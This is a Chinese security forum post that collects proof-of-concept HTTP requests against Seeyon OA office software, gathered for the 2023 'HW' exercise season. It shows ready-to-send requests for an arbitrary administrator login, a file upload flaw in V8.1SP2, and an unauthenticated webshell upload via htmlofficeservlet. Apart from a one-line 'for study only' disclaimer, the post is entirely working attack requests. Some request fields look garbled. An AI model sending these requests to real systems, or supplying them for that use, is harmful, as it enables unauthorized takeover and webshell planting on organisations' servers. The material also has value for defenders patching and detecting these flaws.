DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1852|回复: 0

[2023HW] 致远漏洞 PoC 整理

[复制链接]

172

主题

34

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
339
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2023-8-16 21:41:42 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

致远 OA 任意管理员登录


  1. POST /seeyon/thirdpartyController.do HTTP/1.1

  2. method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
复制代码

致远 OA_V8.1SP2 文件上传漏洞


  1. POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1
  2. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  3. User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64,rident/7.0; ry:11.0)
  4. Accept-Encoding: gzip,deflate
  5. Cookie:JSESSIONID=5bGx5rW35LmL5YWz
  6. Cache-Control: no-cache
  7. Content-Encoding: deflate
  8. Pragma: no-cache
  9. Host: 1.1.1.1
  10. Accept: text/html,image/gif, image/jpeg,*; q=.2,*/*; q=.2
  11. Content-Length:522729
  12. Connection: close
  13. X-Forwarded-For: 1.2.3.4

  14. arguments={"formulaName":"test","formulaAlias":"safe_pre","formulaType":"2","formulaExpression":"","sample":"马子"}
复制代码

致远 OA 协同管理软件无需登录 GetShell


ip/seeyon/htmlofficeservlet

  1. DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
  2. OPTION=S3WYOSWLBSGr
  3. currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
  4. CREATEDATE=wUghPB3szB3Xwg66
  5. RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
  6. originalFileId=wV66
  7. originalCreateDate=wUghPB3szB3Xwg66
  8. FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2
  9. dEg6
  10. needReadFile=yRWZdAS6
  11. originalCreateDate=wLSGP4oEzLKAz4=iz=66
  12. webshell
复制代码

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-4-30 07:12 , Processed in 0.056624 second(s), 24 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表